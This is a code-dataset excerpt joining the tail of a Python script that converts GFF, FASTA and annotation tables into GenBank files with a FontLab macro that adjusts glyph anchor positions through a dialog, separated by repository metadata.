go_alt_ids[go_alt] = go_term
df_go_alternative = pa.DataFrame.from_dict(go_alt_ids, orient='index')
df_go_alternative.reset_index(inplace=True)
df_go_alternative.columns = ['GO', 'alternative_GO']
return df_go_namespace, df_go_alternative
def create_taxonomic_data(species_name):
"""
Query the EBI with the species name to create a dictionary containing taxon id,
taxonomy and some other informations.
"""
species_informations = {}
species_name_url = species_name.replace(' ', '%20')
url = 'https://www.ebi.ac.uk/ena/data/taxonomy/v1/taxon/scientific-name/' + species_name_url
response = requests.get(url)
temp_species_informations = response.json()[0]
for temp_species_information in temp_species_informations:
if temp_species_information == 'lineage':
species_informations['taxonomy'] = temp_species_informations[temp_species_information].split('; ')[:-1]
elif temp_species_information == 'division':
species_informations['data_file_division'] = temp_species_informations[temp_species_information]
elif temp_species_information == 'taxId':
species_informations['db_xref'] = 'taxon:' + str(temp_species_informations[temp_species_information])
else:
species_informations[temp_species_information] = temp_species_informations[temp_species_information]
compatible_species_name = species_name.replace('/', '_')
species_informations['description'] = compatible_species_name + ' genome'
species_informations['organism'] = compatible_species_name
species_informations['keywords'] = [compatible_species_name]
return species_informations
def find_column_of_interest(df):
'''
Gene column is supposed to be the first one.
Detect columns containing GO number, EC number and Interpro ID.
To do this, regular expression are used, for each types of data.
The occurrence of each regular expression is counted.
Then the column containing the maximum of occurrence for a type of data is associated with it by returning it's name.
'''
columns = df.columns.tolist()
gene_column = columns[0]
go_number_expression = r"[FPC]?:?GO[:_][\d]{7}"
ec_expression = r"[Ee]?[Cc]?:?[\d]{1}[\.]{1}[\d]{,2}[\.]{,1}[\d]{,2}[\.]{,1}[\d]{,3}"
ipr_expression = r"IPR[\d]{6}"
go_number_columns = {}
ec_columns = {}
ipr_columns = {}
for column in columns:
df[column] = df[column].astype(str)
go_number_columns[column] = len(df[df[column].str.match(go_number_expression)])
ec_columns[column] = len(df[df[column].str.match(ec_expression)])
ipr_columns[column] = len(df[df[column].str.match(ipr_expression)])
if go_number_columns:
go_number_column = max(go_number_columns, key=go_number_columns.get)
go_column = go_number_column
if ec_columns != []:
ec_column = max(ec_columns, key=ec_columns.get)
else:
ec_column = np.nan
if ipr_columns != []:
ipr_column = max(ipr_columns, key=ipr_columns.get)
else:
ipr_column = np.nan
return gene_column, go_column, ec_column, ipr_column
def contig_info(contig_id, contig_seq, species_informations):
"""
Create contig information from species_informations dictionary and contig id and contig seq.
"""
record = SeqRecord(contig_seq, id=contig_id, name=contig_id,
description=species_informations['description'],
annotations={"molecule_type": "DNA"})
if IUPAC:
record.seq.alphabet = IUPAC.ambiguous_dna
if 'data_file_division' in species_informations:
record.annotations['data_file_division'] = species_informations['data_file_division']
record.annotations['date'] = datetime.date.today().strftime('%d-%b-%Y').upper()
if 'topology' in species_informations:
record.annotations['topology'] = species_informations['topology']
record.annotations['accessions'] = contig_id
if 'organism' in species_informations:
record.annotations['organism'] = species_informations['organism']
# Use of literal_eval for taxonomy and keywords to retrieve list.
if 'taxonomy' in species_informations:
record.annotations['taxonomy'] = species_informations['taxonomy']
if 'keywords' in species_informations:
record.annotations['keywords'] = species_informations['keywords']
if 'source' in species_informations:
record.annotations['source'] = species_informations['source']
new_feature_source = sf.SeqFeature(sf.FeatureLocation(1-1,
len(contig_seq)),
type="source")
new_feature_source.qualifiers['scaffold'] = contig_id
if 'isolate' in species_informations:
new_feature_source.qualifiers['isolate'] = species_informations['isolate']
# db_xref corresponds to the taxon NCBI ID.
# Important if you want to use Pathway Tools after.
if 'db_xref' in species_informations:
new_feature_source.qualifiers['db_xref'] = species_informations['db_xref']
if 'cell_type' in species_informations:
new_feature_source.qualifiers['cell_type'] = species_informations['cell_type']
if 'dev_stage' in species_informations:
new_feature_source.qualifiers['dev_stage'] = species_informations['dev_stage']
if 'mol_type' in species_informations:
new_feature_source.qualifiers['mol_type'] = species_informations['mol_type']
record.features.append(new_feature_source)
return record
def strand_change(input_strand):
"""
The input is strand in str ('-', '+') modify it to be a strand in int (-1, +1) to
be compatible with SeqIO strand reading.
"""
if isinstance(input_strand, str):
if input_strand == '-':
new_strand = -1
elif input_strand == '+':
new_strand = +1
if input_strand == '.':
new_strand = None
elif input_strand == '?':
new_strand = 0
elif isinstance(input_strand, int):
if input_strand == -1:
new_strand = input_strand
elif input_strand == +1:
new_strand = input_strand
return new_strand
def search_and_add_RNA(gff_database, gene_informations, record, type_RNA):
"""
Search in the gff_database if the gene have RNA of the (type_RNA).
For the RNA it will add a feature to the contig record of the genbank.
Then it returns the contig record.
gene_informations contain:
[0] -> gene feature
[1] -> gene ID cleaned
[2] -> gene start position
[3] -> gene end postion
[4] -> gene strand modified (str -> int)
"""
for rna in gff_database.children(gene_informations[0], featuretype=type_RNA, order_by='start'):
new_feature_RNA = sf.SeqFeature(sf.FeatureLocation(gene_informations[2],
gene_informations[3],
gene_informations[4]),
type=type_RNA)
new_feature_RNA.qualifiers['locus_tag'] = gene_informations[1]
record.features.append(new_feature_RNA)
return record
def search_and_add_pseudogene(gff_database, gene, record, df_exons, gene_protein_seq):
"""
Search in the gff_database if the gene is a pseudogene.
Add it to the record.
"""
location_exons = []
for pseudogene in gff_database.children(gene, featuretype="pseudogene", order_by='start'):
# Select exon corresponding to the gene.
# Then iterate for each exon and extract information.
df_temp = df_exons[df_exons['gene_id'] == pseudogene.id]
for _, row in df_temp.iterrows():
new_feature_location_exons = sf.FeatureLocation(row['start'],
row['end'],
row['strand'])
location_exons.append(new_feature_location_exons)
if location_exons and len(location_exons)>=2:
exon_compound_locations = sf.CompoundLocation(location_exons, operator='join')
new_feature_cds = sf.SeqFeature(exon_compound_locations, type='CDS')
else:
start_position = gene.start -1
end_position = gene.end
strand = strand_change(gene.strand)
new_feature_cds = sf.SeqFeature(sf.FeatureLocation(start_position,
end_position,
strand),
type="CDS")
new_feature_cds.qualifiers['translation'] = gene_protein_seq[pseudogene.id]
new_feature_cds.qualifiers['locus_tag'] = gene.id
new_feature_cds.qualifiers['pseudo'] = None
record.features.append(new_feature_cds)
return record
def gff_to_gbk(genome_fasta, prot_fasta, annot_table, gff_file, species_name, gbk_out):
"""
From a genome fasta (containing each contigs of the genome),
a protein fasta (containing each protein sequence),
an annotation table (containing gene name associated with GO terms, InterPro and EC),
a gff file (containing gene, exon, mRNA, ncRNA, tRNA),
a contig information table (containing species name, taxon ID, ..)
create a genbank file.
"""
print('Creating GFF database (gffutils)')
# Create the gff database file.
# gffutils use sqlite3 file-based database to access data inside GFF.
# ':memory:' ask gffutils to keep database in memory instead of writting in a file.
gff_database = gffutils.create_db(gff_file, ':memory:', force=True, keep_order=True, merge_strategy='merge', sort_attribute_values=True)
# Length of your gene ID.
# Catch it in the GFF database.
# It's pretty dumb as we go into a loop for one information.
# But I don't find another way to catch the length of gene_id.
length_gene_id = 0
for gene in gff_database.features_of_type('gene'):
length_gene_id = len(gene.id.replace('gene:', ''))
break
# Get the longest contig ID to check if all contig IDs have the
# same length, if not add 0 (at the supposed position of the number).
longest_contig_id = ""
for contig_for_length_id in gff_database.features_of_type('sequence_assembly'):
if len(longest_contig_id) < len(contig_for_length_id.id):
longest_contig_id = contig_for_length_id.id
print('Formatting fasta and annotation file')
# Dictionary with scaffold/chromosome id as key and sequence as value.
contig_seqs = OrderedDict()
for record in SeqIO.parse(genome_fasta, "fasta"):
id_contig = record.id
contig_seqs[id_contig] = record.seq
# Dictionary with gene id as key and protein sequence as value.
gene_protein_seq = {}
for record in SeqIO.parse(prot_fasta, "fasta"):
gene_protein_seq[record.id] = record.seq
# Create a taxonomy dictionary querying the EBI.
species_informations = create_taxonomic_data(species_name)
# Read a tsv file containing GO terms, Interpro and EC associated with gene name.
mapping_data = pa.read_csv(annot_table, sep='\t')
mapping_data.replace(np.nan, '', inplace=True)
gene_column, go_column, ec_column, ipr_column = find_column_of_interest(mapping_data)
mapping_data.set_index(gene_column, inplace=True)
# Dictionary with gene id as key and GO terms/Interpro/EC as value.
annot_GOs = mapping_data[go_column].to_dict()
annot_IPRs = mapping_data[ipr_column].to_dict()
annot_ECs = mapping_data[ec_column].to_dict()
# Query Gene Ontology to extract namespaces and alternative IDs.
df_go_namespace, df_go_alternative = create_GO_dataframes()
# Dictionary GO id as term and GO namespace as value.
df_go_namespace.set_index('GO', inplace=True)
go_namespaces = df_go_namespace['namespace'].to_dict()
# Dictionary GO id as term and GO alternatives id as value.
df_go_alternative.set_index('GO', inplace=True)
go_alternatives = df_go_alternative['alternative_GO'].to_dict()
# Create a dataframe containing each exon with informations (gene, start, end and strand)
df_exons = pa.DataFrame(columns=['exon_id', 'gene_id', 'start', 'end', 'strand'])
print('Searching for exons')
temporary_datas = []
# Search for all exons in gff database and extract start position (have to minus one to get the right position)
# the end position, the strand (have to change from str to int) and the gene ID.
# Then add it to a list of dictionary that will be added to the dataframe.
for exon in gff_database.features_of_type('exon'):
start_position = exon.start - 1
end_position = exon.end
strand = strand_change(exon.strand)
gene_id = exon.id.replace('exon:', '')[:-2]
temporary_datas.append({'exon_id': exon.id, 'gene_id': gene_id,
'start': start_position, 'end':end_position, 'strand': strand})
df_exons = df_exons.append(temporary_datas)
# All SeqRecord objects will be stored in a list and then give to the SeqIO writer to create the genbank.
seq_objects = []
print('Assembling Genbank informations')
# Iterate through each contig.
# Then iterate through gene and throug RNA linked with the gene.
# Then look if protein informations are available.
for contig_id in sorted(contig_seqs):
# Data for each contig.
record = contig_info(contig_id, contig_seqs[contig_id], species_informations)
for gene in gff_database.features_of_type('gene'):
gene_contig = gene.chrom
if gene_contig == contig_id:
id_gene = gene.id
start_position = gene.start -1
end_position = gene.end
strand = strand_change(gene.strand)
new_feature_gene = sf.SeqFeature(sf.FeatureLocation(start_position,
end_position,
strand),
type="gene")
new_feature_gene.qualifiers['locus_tag'] = id_gene
# Add gene information to contig record.
record.features.append(new_feature_gene)
# Search and add RNAs.
gene_informations = [gene, id_gene, start_position, end_position, strand]
record = search_and_add_RNA(gff_database, gene_informations, record, 'mRNA')
record = search_and_add_RNA(gff_database, gene_informations, record,'tRNA')
record = search_and_add_RNA(gff_database, gene_informations, record, 'ncRNA')
record = search_and_add_RNA(gff_database, gene_informations, record, 'lncRNA')
# Search for pseudogene and add them.
record = search_and_add_pseudogene(gff_database, gene, record, df_exons, gene_protein_seq)
# Create CDS using exons, if no exon use gene information
location_exons = []
# Use parent mRNA in gff to find CDS.
# With this we take the isoform of gene.
for mrna in gff_database.children(gene, featuretype="mRNA", order_by='start'):
mrna_id = mrna.id
# Select exon corresponding to the gene.
# Then iterate for each exon and extract information.
df_temp = df_exons[df_exons['gene_id'] == mrna_id]
for _, row in df_temp.iterrows():
new_feature_location_exons = sf.FeatureLocation(row['start'],
row['end'],
row['strand'])
location_exons.append(new_feature_location_exons)
if location_exons and len(location_exons)>=2:
exon_compound_locations = sf.CompoundLocation(location_exons, operator='join')
new_feature_cds = sf.SeqFeature(exon_compound_locations, type='CDS')
else:
new_feature_cds = sf.SeqFeature(sf.FeatureLocation(start_position,
end_position,
strand),
type="CDS")
new_feature_cds.qualifiers['translation'] = gene_protein_seq[mrna_id]
new_feature_cds.qualifiers['locus_tag'] = id_gene
# Add GO annotation according to the namespace.
if mrna_id in annot_GOs:
gene_gos = re.split(';|,', annot_GOs[mrna_id])
if gene_gos != [""]:
go_components = []
go_functions = []
go_process = []
for go in gene_gos:
# Check if GO term is not a deprecated one.
# If yes take the corresponding one in alternative GO.
if go not in go_namespaces:
go_test = go_alternatives[go]
else:
go_test = go
if go_namespaces[go_test] == 'cellular_component':
go_components.append(go)
if go_namespaces[go_test] == 'molecular_function':
go_functions.append(go)
if go_namespaces[go_test] == 'biological_process':
go_process.append(go)
new_feature_cds.qualifiers['go_component'] = go_components
new_feature_cds.qualifiers['go_function'] = go_functions
new_feature_cds.qualifiers['go_process'] = go_process
# Add InterPro annotation.
if mrna_id in annot_IPRs:
gene_iprs = re.split(';|,', annot_IPRs[mrna_id])
if gene_iprs != [""]:
new_feature_cds.qualifiers['db_xref'] = ["InterPro:"+interpro for interpro in gene_iprs]
# Add EC annotation.
if mrna_id in annot_ECs:
gene_ecs = re.split(';|,', annot_ECs[mrna_id])
if gene_ecs != [""]:
new_feature_cds.qualifiers['EC_number'] = [ec.replace('ec:', '') for ec in gene_ecs]
# Add CDS information to contig record
record.features.append(new_feature_cds)
seq_objects.append(record)
# Create Genbank with the list of SeqRecord.
SeqIO.write(seq_objects, gbk_out, 'genbank')
def main(genome_fasta, prot_fasta, annot_table, gff_file_folder, species_name, gbk_out):
# Check if gff is a file or is multiple files in a folder.
# If it's multiple files, it wil merge them in one.
if os.path.isfile(gff_file_folder):
gff_file = gff_file_folder
if not os.path.isfile(gff_file_folder):
gff_file = merging_mini_gff(gff_file_folder)
gff_to_gbk(genome_fasta, prot_fasta, annot_table, gff_file, species_name, gbk_out)
def run():
parser = argparse.ArgumentParser(prog = "gbk_creator_from_gff.py")
parser.add_argument("-fg", "--fgen", dest = "genome_fasta", metavar = "FILE", help = "contig fasta file", required = True)
parser.add_argument("-fp", "--fprot", dest = "prot_fasta", metavar = "FILE", help = "protein fasta file", required = True)
parser.add_argument("-a", "--annot", dest = "annot_table", metavar = "FILE", help = "annotation tsv file", required = True)
parser.add_argument("-g", "--gff", dest = "gff_file_folder", metavar = "FILE or FOLDER", help = "gff file or folder containing multiple gff", required = True)
parser.add_argument("-s", "--speciesname", dest = "species_name", metavar = "STRING", help = "species scientific name", required = True)
parser.add_argument("-o", "--output", dest = "gbk_out", metavar = "FILE", help = "output file", default = "mygbk.gbk")
args = parser.parse_args()
main(genome_fasta=args.genome_fasta, prot_fasta=args.prot_fasta, annot_table=args.annot_table,
gff_file_folder=args.gff_file_folder, species_name=args.species_name, gbk_out=args.gbk_out)
if __name__ == '__main__':
run()
| 46.617591 | 162 | 0.632132 | 3,052 | 24,381 | 4.815858 | 0.149738 | 0.054293 | 0.014152 | 0.015648 | 0.326915 | 0.25432 | 0.201592 | 0.165056 | 0.131923 | 0.116002 | 0 | 0.004492 | 0.27866 | 24,381 | 522 | 163 | 46.706897 | 0.831239 | 0.234486 | 0 | 0.16242 | 0 | 0.006369 | 0.089455 | 0.005985 | 0 | 0 | 0 | 0 | 0 | 1 | 0.035032 | false | 0 | 0.05414 | 0 | 0.11465 | 0.012739 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
1a3e9d713d8d312ad682cee9b4c6fc31735f9eac | 14,362 | py | Python | Anchors/AdjustAnchors.py | davelab6/fontlab-scripts-1 | 2e59280a2af5dfe708e9ad112b7286f7bf92eb48 | [
"MIT"
] | 33 | 2015-02-25T11:40:08.000Z | 2021-11-12T05:41:09.000Z | Anchors/AdjustAnchors.py | davelab6/fontlab-scripts-1 | 2e59280a2af5dfe708e9ad112b7286f7bf92eb48 | [
"MIT"
] | 1 | 2015-03-07T09:10:20.000Z | 2015-03-08T08:32:57.000Z | Anchors/AdjustAnchors.py | davelab6/fontlab-scripts-1 | 2e59280a2af5dfe708e9ad112b7286f7bf92eb48 | [
"MIT"
] | 15 | 2015-04-03T03:48:36.000Z | 2021-08-30T08:18:26.000Z | #FLM: Adjust Anchors
__copyright__ = __license__ = """
Copyright (c) 2010-2012 Adobe Systems Incorporated. All rights reserved.
Permission is hereby granted, free of charge, to any person obtaining a copy of
this software and associated documentation files (the "Software"), to deal in
the Software without restriction, including without limitation the rights to
use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of
the Software, and to permit persons to whom the Software is furnished to do so,
subject to the following conditions:
The above copyright notice and this permission notice shall be included in all
copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS
FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR
COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER
IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN
CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
"""
__doc__ = """
Adjust Anchors v1.2 - Jul 12 2012
This script provides a UI for adjusting the position of anchors interactively.
FontLab's own UI for ajusting anchors is too poor.
Opening FontLab's Preview window and selecting the Anchors pane before running
this script, will allow you to preview the adjustments even better.
==================================================
Versions:
v1.0 - Apr 29 2010 - Initial version.
v1.1 - Jun 15 2012 - UI improvements.
v1.2 - Jul 12 2012 - Fixed issue that affected single master fonts.
"""
listGlyphsSelected = []
def getgselectedglyphs(font, glyph, gindex):
listGlyphsSelected.append(gindex)
fl.ForSelected(getgselectedglyphs)
def getMasterNames(masters, axes):
global matrix
masterNames = []
if masters > 1:
for m in range(masters):
mtx = matrix[m]
masterName = ''
for i in range(len(axes)):
masterName += ' ' + axes[i][1] + str(mtx[i])
masterNames.append(masterName)
return masterNames
matrix = [
(0,0,0,0),(1,0,0,0),(0,1,0,0),(1,1,0,0),(0,0,1,0),(1,0,1,0),(0,1,1,0),(1,1,1,0),
(0,0,0,1),(1,0,0,1),(0,1,0,1),(1,1,0,1),(0,0,1,1),(1,0,1,1),(0,1,1,1),(1,1,1,1)
]
STYLE_RADIO = STYLE_CHECKBOX + cTO_CENTER
def run(gIndex):
masters = f[0].layers_number
axes = f.axis
masterNames = getMasterNames(masters, axes)
increment = 0
if len(axes) == 3:
increment = 90
elif len(axes) > 3:
fl.Message("This macro does not support 4-axis fonts")
return
fl.EditGlyph(gIndex) # opens Glyph Window in case it's not open yet
glyphBkupDict = {} # this will store a copy of the edited glyphs and will be used in case 'Cancel' is pressed
class DialogClass:
def __init__(self):
self.d = Dialog(self)
self.d.size = Point(660, 110 + 48*4 + increment)
self.d.Center()
self.d.title = 'Adjust Anchors'
self.anchorList = []
self.anchorList_index = 0
self.anchorList_selected = 0
self.selectedAnchor = None
self.glyph = f[gIndex]
self.gIndex = gIndex
self.gName = self.glyph.name
self.gHasAnchors = 0
self.glyphList = []
self.glyphList_index = 0
self.glyphList_selected = 0
self.selectedglyph = None
self.k_BIG_SHIFT = 20
self.k_MEDIUM_SHIFT = 5
self.k_SMALL_SHIFT = 1
self.Xshift = 0
self.Yshift = 0
self.Xorig = 0
self.Yorig = 0
self.Xfinal = 0
self.Yfinal = 0
self.RBmasterIndex = 0
if fl.layer == 0: self.RBmaster0 = 1
else: self.RBmaster0 = 0
if fl.layer == 1: self.RBmaster1 = 1
else: self.RBmaster1 = 0
if fl.layer == 2: self.RBmaster2 = 1
else: self.RBmaster2 = 0
if fl.layer == 3: self.RBmaster3 = 1
else: self.RBmaster3 = 0
if fl.layer == 4: self.RBmaster4 = 1
else: self.RBmaster4 = 0
if fl.layer == 5: self.RBmaster5 = 1
else: self.RBmaster5 = 0
if fl.layer == 6: self.RBmaster6 = 1
else: self.RBmaster6 = 0
if fl.layer == 7: self.RBmaster7 = 1
else: self.RBmaster7 = 0
# Fill in the Anchor list
for anchor in self.glyph.anchors:
self.anchorList.append(anchor.name)
# Fill in the Glyph list
for g in f.glyphs:
if len(g.anchors) > 0:
self.glyphList.append(g.name)
# Checks if the initially selected glyph has anchors
if self.gName in self.glyphList:
self.gHasAnchors = 1
posy = 10 + 48*0 # (xTop , yTop , xBot , yBot)
self.d.AddControl(BUTTONCONTROL, Rect(310, posy, 350, posy+40), 'Yplus5', STYLE_BUTTON, '+'+ str(self.k_MEDIUM_SHIFT))
posy = 10 + 24*1
self.d.AddControl(LISTCONTROL, Rect( 10, posy, 150, posy+110), 'glyphList', STYLE_LIST, 'Glyphs')
self.d.AddControl(LISTCONTROL, Rect(510, posy, 650, posy+110), 'anchorList', STYLE_LIST, 'Anchors')
posy = 10 + 48*1
self.d.AddControl(BUTTONCONTROL, Rect(310, posy, 350, posy+40), 'Yplus1', STYLE_BUTTON, '+'+ str(self.k_SMALL_SHIFT))
posy = 10 + 48*2
self.d.AddControl(BUTTONCONTROL, Rect(160, posy, 200, posy+40), 'Xminus20', STYLE_BUTTON, '-'+ str(self.k_BIG_SHIFT))
self.d.AddControl(BUTTONCONTROL, Rect(210, posy, 250, posy+40), 'Xminus5', STYLE_BUTTON, '-'+ str(self.k_MEDIUM_SHIFT))
self.d.AddControl(BUTTONCONTROL, Rect(260, posy, 300, posy+40), 'Xminus1', STYLE_BUTTON, '-'+ str(self.k_SMALL_SHIFT))
self.d.AddControl(STATICCONTROL, Rect(310, posy, 323, posy+20), 'stat_label', STYLE_LABEL+cTO_CENTER, 'x:')
self.d.AddControl(STATICCONTROL, Rect(323, posy, 360, posy+20), 'Xshift', STYLE_LABEL+cTO_CENTER)
self.d.AddControl(STATICCONTROL, Rect(310, posy+20, 323, posy+40), 'stat_label', STYLE_LABEL+cTO_CENTER, 'y:')
self.d.AddControl(STATICCONTROL, Rect(323, posy+20, 360, posy+40), 'Yshift', STYLE_LABEL+cTO_CENTER)
self.d.AddControl(BUTTONCONTROL, Rect(360, posy, 400, posy+40), 'Xplus1', STYLE_BUTTON, '+'+ str(self.k_SMALL_SHIFT))
self.d.AddControl(BUTTONCONTROL, Rect(410, posy, 450, posy+40), 'Xplus5', STYLE_BUTTON, '+'+ str(self.k_MEDIUM_SHIFT))
self.d.AddControl(BUTTONCONTROL, Rect(460, posy, 500, posy+40), 'Xplus20', STYLE_BUTTON, '+'+ str(self.k_BIG_SHIFT))
for i in range(len(masterNames)):
posy = 154 + 22*i
self.d.AddControl(CHECKBOXCONTROL, Rect( 25, posy, 200, posy+20), 'RBmaster'+ str(i), STYLE_RADIO, masterNames[i])
posy = 10 + 48*3
self.d.AddControl(BUTTONCONTROL, Rect(310, posy, 350, posy+40), 'Yminus1', STYLE_BUTTON, '-'+ str(self.k_SMALL_SHIFT))
self.d.AddControl(STATICCONTROL, Rect(528, posy, 650, posy+20), 'stat_label', STYLE_LABEL+cTO_CENTER, 'Original position')
self.d.AddControl(STATICCONTROL, Rect(530, posy+20, 543, posy+40), 'stat_label', STYLE_LABEL+cTO_CENTER, 'x:')
self.d.AddControl(STATICCONTROL, Rect(543, posy+20, 580, posy+40), 'Xorig', STYLE_LABEL+cTO_CENTER)
self.d.AddControl(STATICCONTROL, Rect(590, posy+20, 603, posy+40), 'stat_label', STYLE_LABEL+cTO_CENTER, 'y:')
self.d.AddControl(STATICCONTROL, Rect(603, posy+20, 640, posy+40), 'Yorig', STYLE_LABEL+cTO_CENTER)
posy = 10 + 48*4
self.d.AddControl(BUTTONCONTROL, Rect(310, posy, 350, posy+40), 'Yminus5', STYLE_BUTTON, '-'+ str(self.k_MEDIUM_SHIFT))
self.d.AddControl(STATICCONTROL, Rect(528, posy, 650, posy+20), 'stat_label', STYLE_LABEL+cTO_CENTER, 'Final position')
self.d.AddControl(STATICCONTROL, Rect(530, posy+20, 543, posy+40), 'stat_label', STYLE_LABEL+cTO_CENTER, 'x:')
self.d.AddControl(STATICCONTROL, Rect(543, posy+20, 580, posy+40), 'Xfinal', STYLE_LABEL+cTO_CENTER)
self.d.AddControl(STATICCONTROL, Rect(590, posy+20, 603, posy+40), 'stat_label', STYLE_LABEL+cTO_CENTER, 'y:')
self.d.AddControl(STATICCONTROL, Rect(603, posy+20, 640, posy+40), 'Yfinal', STYLE_LABEL+cTO_CENTER)
#====== DIALOG FUNCTIONS =========
def on_Xminus20(self, code):
if self.anchorList_selected:
self.Xshift -= self.k_BIG_SHIFT
self.d.PutValue('Xshift')
self.updateXfinal()
self.update_glyph()
def on_Xminus5(self, code):
if self.anchorList_selected:
self.Xshift -= self.k_MEDIUM_SHIFT
self.d.PutValue('Xshift')
self.updateXfinal()
self.update_glyph()
def on_Xminus1(self, code):
if self.anchorList_selected:
self.Xshift -= self.k_SMALL_SHIFT
self.d.PutValue('Xshift')
self.updateXfinal()
self.update_glyph()
def on_Xplus1(self, code):
if self.anchorList_selected:
self.Xshift += self.k_SMALL_SHIFT
self.d.PutValue('Xshift')
self.updateXfinal()
self.update_glyph()
def on_Xplus5(self, code):
if self.anchorList_selected:
self.Xshift += self.k_MEDIUM_SHIFT
self.d.PutValue('Xshift')
self.updateXfinal()
self.update_glyph()
def on_Xplus20(self, code):
if self.anchorList_selected:
self.Xshift += self.k_BIG_SHIFT
self.d.PutValue('Xshift')
self.updateXfinal()
self.update_glyph()
def on_Yminus5(self, code):
if self.anchorList_selected:
self.Yshift -= self.k_MEDIUM_SHIFT
self.d.PutValue('Yshift')
self.updateYfinal()
self.update_glyph()
def on_Yminus1(self, code):
if self.anchorList_selected:
self.Yshift -= self.k_SMALL_SHIFT
self.d.PutValue('Yshift')
self.updateYfinal()
self.update_glyph()
def on_Yplus1(self, code):
if self.anchorList_selected:
self.Yshift += self.k_SMALL_SHIFT
self.d.PutValue('Yshift')
self.updateYfinal()
self.update_glyph()
def on_Yplus5(self, code):
if self.anchorList_selected:
self.Yshift += self.k_MEDIUM_SHIFT
self.d.PutValue('Yshift')
self.updateYfinal()
self.update_glyph()
def on_glyphList(self, code):
self.glyphList_selected = 1
self.gHasAnchors = 1
self.d.GetValue('glyphList')
self.gName = self.glyphList[self.glyphList_index] # Name of the glyph selected on the glyph list
self.gIndex = f.FindGlyph(self.gName)
fl.iglyph = self.gIndex # Switch the glyph on the Glyph Window
self.glyph = f[self.gIndex]
self.updateAnchorsList()
self.resetDialogValues()
def on_anchorList(self, code):
self.anchorList_selected = 1
self.d.GetValue('anchorList')
self.updateDialogValues()
def on_RBmaster0(self, code): self.updateRBmaster(0)
def on_RBmaster1(self, code): self.updateRBmaster(1)
def on_RBmaster2(self, code): self.updateRBmaster(2)
def on_RBmaster3(self, code): self.updateRBmaster(3)
def on_RBmaster4(self, code): self.updateRBmaster(4)
def on_RBmaster5(self, code): self.updateRBmaster(5)
def on_RBmaster6(self, code): self.updateRBmaster(6)
def on_RBmaster7(self, code): self.updateRBmaster(7)
def on_ok(self, code):
return 1
#====== RESET FUNCTIONS =========
def resetDialogValues(self):
self.resetXorig()
self.resetYorig()
self.resetXshift()
self.resetYshift()
self.resetXfinal()
self.resetYfinal()
def resetXorig(self):
self.Xorig = 0
self.d.PutValue('Xorig')
def resetYorig(self):
self.Yorig = 0
self.d.PutValue('Yorig')
def resetXshift(self):
self.Xshift = 0
self.d.PutValue('Xshift')
def resetYshift(self):
self.Yshift = 0
self.d.PutValue('Yshift')
def resetXfinal(self):
self.Xfinal = 0
self.d.PutValue('Xfinal')
def resetYfinal(self):
self.Yfinal = 0
self.d.PutValue('Yfinal')
#====== UPDATE FUNCTIONS =========
def updateRBmaster(self, newIndex):
self.RBmasterIndex = newIndex
if self.RBmasterIndex == 0: self.RBmaster0 = 1
else: self.RBmaster0 = 0
if self.RBmasterIndex == 1: self.RBmaster1 = 1
else: self.RBmaster1 = 0
if self.RBmasterIndex == 2: self.RBmaster2 = 1
else: self.RBmaster2 = 0
if self.RBmasterIndex == 3: self.RBmaster3 = 1
else: self.RBmaster3 = 0
if self.RBmasterIndex == 4: self.RBmaster4 = 1
else: self.RBmaster4 = 0
if self.RBmasterIndex == 5: self.RBmaster5 = 1
else: self.RBmaster5 = 0
if self.RBmasterIndex == 6: self.RBmaster6 = 1
else: self.RBmaster6 = 0
if self.RBmasterIndex == 7: self.RBmaster7 = 1
else: self.RBmaster7 = 0
for v in ['RBmaster0','RBmaster1','RBmaster2','RBmaster3','RBmaster4','RBmaster5','RBmaster6','RBmaster7']:
self.d.PutValue(v)
fl.layer = self.RBmasterIndex
if self.gHasAnchors and self.anchorList_selected:
self.updateDialogValues()
def updateAnchorsList(self):
self.anchorList = []
for anchor in self.glyph.anchors:
self.anchorList.append(anchor.name)
self.d.PutValue('anchorList')
self.anchorList_selected = 0
self.selectedAnchor = None
def updateDialogValues(self):
self.selectedAnchor = self.glyph.anchors[self.anchorList_index].Layer(fl.layer)
self.updateXorig(self.selectedAnchor.x)
self.updateYorig(self.selectedAnchor.y)
self.resetXshift()
self.resetYshift()
self.updateXfinal()
self.updateYfinal()
def updateXorig(self, pos):
self.Xorig = pos
self.d.PutValue('Xorig')
def updateYorig(self, pos):
self.Yorig = pos
self.d.PutValue('Yorig')
def updateXfinal(self):
if self.anchorList_selected:
self.Xfinal = self.Xorig + self.Xshift
self.d.PutValue('Xfinal')
def updateYfinal(self):
if self.anchorList_selected:
self.Yfinal = self.Yorig + self.Yshift
self.d.PutValue('Yfinal')
def update_glyph(self):
if self.anchorList_selected:
if self.gIndex not in glyphBkupDict:
# print "Made backup copy of '%s'" % self.glyph.name
glyphBkupDict[self.gIndex] = Glyph(f[self.gIndex])
fl.SetUndo(self.gIndex)
x = self.Xfinal
y = self.Yfinal
anchorPosition = Point(x, y)
anchorIndex = self.anchorList_index
anchor = self.glyph.anchors[anchorIndex]
# In single master fonts the adjustment of the anchors cannot be handled by the codepath used for multiple
# master fonts, because the UI gets updated but the changes are not stored in the VFB file upon saving.
if masters == 1:
anchor.x = x
anchor.y = y
else:
anchor.SetLayer(fl.layer, anchorPosition)
fl.UpdateGlyph(self.gIndex)
def Run(self):
return self.d.Run()
d = DialogClass()
if d.Run() == 1:
f.modified = 1
else:
for gID in glyphBkupDict:
f[gID] = glyphBkupDict[gID]
fl.UpdateGlyph(gID)
f.modified = 0
if __name__ == "__main__":
f = fl.font
gIndex = fl.iglyph
if f is None:
fl.Message('No font opened')
elif gIndex < 0:
if len(listGlyphsSelected) == 0:
fl.Message('Glyph selection is not valid')
else:
